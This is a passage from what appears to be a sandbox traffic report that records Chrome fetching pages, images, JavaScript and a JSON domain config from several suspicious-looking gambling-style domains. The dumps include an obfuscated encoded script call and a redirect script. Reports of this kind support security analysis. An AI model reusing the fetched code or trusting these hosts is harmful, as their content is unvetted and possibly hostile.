                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://xpj723.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:57 UTC340INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:57 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          ETag: "5e15c8c5-62"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Wed, 08 Jan 2020 12:19:17 GMT
                                                                                                                                                          Content-Length: 98
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 5963122412863352946
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:57 UTC98INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 03 50 4c 54 45 ff ff ff a7 c4 1b c8 00 00 00 0a 49 44 41 54 08 d7 63 60 00 00 00 02 00 01 e2 21 bc 33 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR%VgAMAaPLTEIDATc`!3IENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          173192.168.2.54991990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:57 UTC542OUTGET /pc/240516-03/static/js/manifest.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:57 UTC643INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:57 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 18632
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:59:00 GMT
                                                                                                                                                          ETag: "6645cad4-48c8"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[3],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE3[561],EU-GER-frankfurt-GLOBAL1-CACHE9[552,TCP_MISS,556],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 032b821ad6156fe0f9d51b2518572ed9
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1993392
                                                                                                                                                          X-CCDN-Expires: 598608
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:57 UTC15741INData Raw: 61 34 76 6a 65 75 75 65 28 22 49 51 4d 77 72 67 64 67 78 67 4c 67 6c 67 65 77 67 43 67 51 53 67 4e 34 44 63 43 47 41 6e 41 41 67 47 63 42 65 41 64 7a 67 67 42 4d 45 79 41 36 4d 67 55 77 43 4d 41 48 48 4b 41 61 77 43 6b 69 6c 57 41 33 42 57 71 30 47 4c 64 6c 31 37 38 53 34 61 50 43 54 49 59 41 47 67 43 32 53 67 46 61 59 51 43 50 4d 6c 79 46 57 53 75 45 72 78 4b 6f 4a 41 41 78 4b 41 4e 69 51 44 61 41 58 51 46 51 41 50 44 44 72 58 47 45 41 4f 59 77 41 46 73 34 41 31 49 46 6f 63 43 51 77 64 6c 41 4f 53 6f 78 32 63 41 34 41 5a 41 6e 57 64 4b 78 67 52 48 37 49 73 66 46 32 46 67 35 6f 4d 58 45 4f 6c 67 4c 61 75 71 77 45 6c 41 51 71 61 41 44 79 7a 4f 71 4d 73 4b 6c 34 43 44 42 74 41 4a 36 73 6a 48 52 2b 4f 45 53 31 5a 42 41 41 43 71 33 64 65 44 41 64 64 46 41 34
                                                                                                                                                          Data Ascii: a4vjeuue("IQMwrgdgxgLglgewgCgQSgN4DcCGAnAAgGcBeAdzggBMEyA6MgUwCMAHHKAawCkilWA3BWq0GLdl178S4aPCTIYAGgC2SgFaYQCPMlyFWSuErxKoJAAxKANiQDaAXQFQAPDDrXGEAOYwAFs4A1IFocCQwdlAOSox2cA4AZAnWdKxgRH7IsfF2Fg5oMXEOlgLauqwElAQqaADyzOqMsKl4CDBtAJ6sjHR+OES1ZBAACq3deDAddFA4
                                                                                                                                                          2024-06-09 22:40:57 UTC2891INData Raw: 75 49 73 2b 61 76 79 6f 73 58 32 62 79 76 43 39 4b 68 65 44 58 55 46 56 4c 7a 63 39 6d 2f 51 70 4d 76 62 58 69 31 35 75 4c 6c 64 78 65 78 37 70 33 6d 62 79 35 2b 6a 46 59 70 69 76 7a 72 72 46 42 5a 2f 64 65 42 6c 41 76 41 43 51 6c 50 36 2b 49 2f 58 66 2f 6b 49 62 78 62 30 47 39 39 4b 63 66 79 76 46 61 66 56 49 65 4a 65 2b 56 6a 47 55 69 6e 6a 37 78 57 6c 54 4b 48 69 37 76 6d 5a 41 2b 32 31 35 56 4c 73 6f 7a 76 57 6e 68 48 49 6a 36 75 2f 30 34 50 55 6e 6d 59 72 2f 71 55 52 38 57 65 63 63 50 4b 48 4c 33 46 2f 4e 4c 34 2b 43 76 63 44 34 6e 31 6a 35 4e 53 38 70 63 66 71 5a 42 4d 6c 31 2f 4f 4d 68 6b 45 79 6f 58 74 6e 44 65 4b 63 2f 37 65 58 50 50 70 5a 6e 32 65 34 6f 51 65 70 6b 79 58 58 34 4d 72 4b 6e 73 2b 35 66 47 48 2f 50 30 7a 39 65 4b 5a 53 72 75 41 66
                                                                                                                                                          Data Ascii: uIs+avyosX2byvC9KheDXUFVLzc9m/QpMvbXi15uLldxex7p3mby5+jFYpivzrrFBZ/deBlAvACQlP6+I/Xf/kIbxb0G99KcfyvFafVIeJe+VjGUinj7xWlTKHi7vmZA+215VLsozvWnhHIj6u/04PUnmYr/qUR8WeccPKHL3F/NL4+CvcD4n1j5NS8pcfqZBMl1/OMhkEyoXtnDeKc/7eXPPpZn2e4oQepkyXX4MrKns+5fGH/P0z9eKZSruAf


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          174192.168.2.549916202.61.87.2244434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:57 UTC631OUTGET / HTTP/1.1
                                                                                                                                                          Host: js326.cc
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:57 UTC407INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:57 GMT
                                                                                                                                                          Content-Type: text/html
                                                                                                                                                          Content-Length: 48883
                                                                                                                                                          Connection: close
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Last-Modified: Tue, 06 Jun 2023 07:31:39 GMT
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          ETag: "647ee0db-bef3"
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          X-Cache: EXPIRED
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:57 UTC15977INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 57 65 6c 63 6f 6d 65 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 73 74 79 6c 65
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1"> <meta property="og:description" content="Welcome"> <title></title> <style
                                                                                                                                                          2024-06-09 22:40:57 UTC16384INData Raw: 20 38 36 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 32 38 70 78 0d 0a 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 6c 6f 61 64 69 6e 67 2d 69 6e 6e 65 72 2d 33 20 7b 0d 0a 20 20 20 20 20 20 30 25 20 7b 0d 0a 20 20 20 20 20 20 20 20 74 6f 70 3a 20 37 39 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 34 32 70 78 0d 0a 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 35 30 25 20 7b 0d 0a 20 20 20 20 20 20 20 20 74 6f 70 3a 20 38 36 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 32 38 70 78 0d 0a 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 31 30 30 25 20 7b 0d 0a 20 20 20 20 20 20 20 20 74 6f 70 3a 20 38 36 70 78 3b 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                          Data Ascii: 86px; height: 28px } } @keyframes loading-inner-3 { 0% { top: 79px; height: 42px } 50% { top: 86px; height: 28px } 100% { top: 86px;
                                                                                                                                                          2024-06-09 22:40:57 UTC16384INData Raw: 64 6f 6d 4f 63 73 41 70 69 4d 61 78 74 68 72 65 73 68 3a 20 33 2c 0d 0a 20 20 20 20 20 20 20 20 6f 63 73 4b 65 79 44 69 63 74 3a 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 27 64 6b 30 35 27 3a 20 27 6c 74 64 6b 27 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 27 6a 62 30 30 27 3a 20 27 6c 74 64 6b 27 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 27 6d 77 30 30 27 3a 20 27 6c 74 64 6b 27 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 27 63 63 30 35 27 3a 20 27 6c 74 64 6b 27 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 27 6c 70 30 35 27 3a 20 27 6c 74 64 6b 27 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 27 61 6f 30 38 27 3a 20 27 6c 74 70 6f 63 27 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 6c 73 4b 65 79 3a 20 7b 0d 0a 20 20 20 20 20 20 20 20 68
                                                                                                                                                          Data Ascii: domOcsApiMaxthresh: 3, ocsKeyDict: { 'dk05': 'ltdk', 'jb00': 'ltdk', 'mw00': 'ltdk', 'cc05': 'ltdk', 'lp05': 'ltdk', 'ao08': 'ltpoc' } }, lsKey: { h
                                                                                                                                                          2024-06-09 22:40:57 UTC138INData Raw: 20 20 20 7d 0d 0a 20 20 20 20 6a 75 6d 70 2e 73 74 61 72 74 28 29 0d 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 76 61 72 20 72 64 6d 5a 74 73 53 74 72 20 3d 20 27 36 33 62 63 64 65 34 31 65 35 32 39 33 66 66 34 64 33 61 36 36 39 65 65 65 37 61 34 34 32 35 62 27 3b 20 0d 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                          Data Ascii: } jump.start() </script> <script> var rdmZtsStr = '63bcde41e5293ff4d3a669eee7a4425b'; </script></body></html>


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          175192.168.2.54992090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:57 UTC366OUTGET /pc/image-pc/video/pt_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:57 UTC632INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:57 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 13569
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-3501"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[1],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE7[393],EU-GER-frankfurt-GLOBAL1-CACHE9[384,TCP_MISS,389],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 9febfea1748195783c500ee8b6dc9273
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814486
                                                                                                                                                          X-CCDN-Expires: 2464136
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:57 UTC13569INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          176192.168.2.549918183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:57 UTC538OUTGET /ftl/commonPage/js/layer.js HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:57 UTC705INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 7599
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-TZ-MP-23-10
                                                                                                                                                          ETag: W/"5d848f4f-55f6"
                                                                                                                                                          Date: Thu, 06 Jun 2024 12:05:04 GMT
                                                                                                                                                          Last-Modified: Fri, 20 Sep 2019 08:35:27 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 12:05:04 GMT
                                                                                                                                                          Age: 297353
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-206
                                                                                                                                                          x-link-via: dgct63:443;tzmp23:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-TZ-MP-23-10
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-DG-CT-63-14
                                                                                                                                                          X-Cdn-Request-ID: 707217bc8e59f320f82709d06f414e41
                                                                                                                                                          2024-06-09 22:40:57 UTC7599INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 3c ed 6e e3 48 72 ff f3 14 32 ef 22 93 2b 8a a6 64 8f 3d 43 99 16 66 66 67 92 01 66 73 97 db 41 ee 16 5a 05 a0 a9 96 c5 1d 8a d4 91 2d cf 78 2d fd 49 f2 28 79 81 00 41 80 e0 02 e4 65 72 48 1e 23 55 d5 1f ec a6 28 cf ee 26 30 60 b1 3f d8 5d 5d df 55 dd cd b3 af 4e 7a 79 f2 c0 aa e1 fd 79 30 0a c2 de ef d9 ed 9f ff e3 df ff fc 2f ff f0 df 7f fa a7 ff fa d3 bf f5 be 79 f7 a1 f7 3e 4b 59 51 b3 5e 6f c5 f9 26 3a 3b a3 17 02 f8 bf cd 82 b4 5c 9f f5 7a af 1e 7a ff f3 af ff fc e7 ff fc c7 de 57 67 7f d1 9b 9c 2c b7 45 ca b3 b2 70 99 cf bd 47 67 0b 2f d7 bc ca 52 ee 4c ee 93 aa 97 f9 85 9f c4 4c 0c d1 ef 8b 91 16 6c 99 15 cc 2f e3 c7 3b c6 7f 9b f0 55 a4 47 f1 1e f1 2d 16 2f ca 74 bb 66 05 0f ea b4 ca 36 bc f6 79 cc 66 30 0c 2b ee
                                                                                                                                                          Data Ascii: <nHr2"+d=CffgfsAZ-x-I(yAerH#U(&0`?]]UNzyy0/y>KYQ^o&:;\zzWg,EpGg/RLLl/;UG-/tf6yf0+


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          177192.168.2.549923163.181.92.2264434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:57 UTC365OUTGET /ocs/zbw?r=5552162052 HTTP/1.1
                                                                                                                                                          Host: ocsapi1961.hydqef.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:57 UTC487INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:57 GMT
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Api-Elapsed: 0.0000
                                                                                                                                                          X-Node: outer
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          Via: cache22.l2hk3[5,0], cache3.l2sg3[38,0], ens-cache12.de5[211,0]
                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                          EagleId: a3b55ca017179728572462729e
                                                                                                                                                          2024-06-09 22:40:57 UTC11101INData Raw: 32 62 35 35 0d 0a 7b 0a 20 20 20 20 22 6e 6e 6e 22 3a 20 22 6f 75 74 65 72 2d 38 38 38 22 2c 0a 20 20 20 20 22 76 65 72 73 69 6f 6e 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 7a 62 5f 6d 22 3a 20 22 32 34 30 36 30 36 2d 30 31 22 2c 0a 20 20 20 20 20 20 20 20 22 7a 62 5f 70 63 5f 6d 65 6d 62 65 72 22 3a 20 22 32 34 30 35 32 39 2d 30 31 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 68 74 74 70 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 43 44 4e 5f 50 41 54 48 53 22 3a 20 5b 22 7a 62 2d 71 71 2e 67 7a 6a 71 77 6c 6b 6a 2e 63 6f 6d 22 2c 22 7a 62 31 2d 68 77 2e 71 65 63 74 79 6f 75 61 2e 63 6f 6d 22 2c 22 7a 62 2d 68 77 2e 63 7a 77 79 67 73 2e 63 6f 6d 22 5d 2c 0a 20 20 20 20 20 20 20 20 22 41 50 49 5f 44 4f 4d 41 49 4e 53 22 3a 20 5b 22 6f 63 73 61 70 69 2d 6c
                                                                                                                                                          Data Ascii: 2b55{ "nnn": "outer-888", "versions": { "zb_m": "240606-01", "zb_pc_member": "240529-01" }, "http": { "CDN_PATHS": ["zb-qq.gzjqwlkj.com","zb1-hw.qectyoua.com","zb-hw.czwygs.com"], "API_DOMAINS": ["ocsapi-l
                                                                                                                                                          2024-06-09 22:40:57 UTC7303INData Raw: 31 63 37 66 0d 0a 76 22 3a 22 32 32 31 30 30 37 2d 30 31 22 2c 22 74 22 3a 31 30 34 7d 2c 0a 09 22 74 33 38 36 32 22 3a 20 7b 22 76 22 3a 22 32 33 30 36 30 37 2d 30 31 22 2c 22 74 22 3a 31 30 31 7d 2c 0a 09 22 74 33 38 36 33 22 3a 20 7b 22 76 22 3a 22 32 32 30 38 31 35 2d 30 31 22 2c 22 74 22 3a 31 30 38 7d 2c 0a 09 22 74 33 38 36 34 22 3a 20 7b 22 76 22 3a 22 32 32 31 30 30 37 2d 30 31 22 2c 22 74 22 3a 31 30 38 7d 2c 0a 09 22 74 33 38 36 35 22 3a 20 7b 22 76 22 3a 22 32 32 31 30 30 37 2d 30 31 22 2c 22 74 22 3a 31 30 34 7d 2c 0a 09 22 74 33 38 36 36 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 31 36 2d 30 33 22 2c 22 74 22 3a 31 30 31 7d 2c 0a 09 22 74 33 38 36 37 22 3a 20 7b 22 76 22 3a 22 32 32 31 30 30 37 2d 30 31 22 2c 22 74 22 3a 31 30 31 7d 2c 0a 09 22
                                                                                                                                                          Data Ascii: 1c7fv":"221007-01","t":104},"t3862": {"v":"230607-01","t":101},"t3863": {"v":"220815-01","t":108},"t3864": {"v":"221007-01","t":108},"t3865": {"v":"221007-01","t":104},"t3866": {"v":"240516-03","t":101},"t3867": {"v":"221007-01","t":101},"
                                                                                                                                                          2024-06-09 22:40:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          178192.168.2.549921183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:57 UTC560OUTGET /ftl/commonPage/js/jquery/jquery.super-marquee.js HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:57 UTC714INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 1421
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XIANY-MP-05-22
                                                                                                                                                          ETag: W/"5d848f4f-1151"
                                                                                                                                                          Date: Thu, 06 Jun 2024 12:04:59 GMT
                                                                                                                                                          Last-Modified: Fri, 20 Sep 2019 08:35:27 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 12:04:59 GMT
                                                                                                                                                          Age: 297358
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
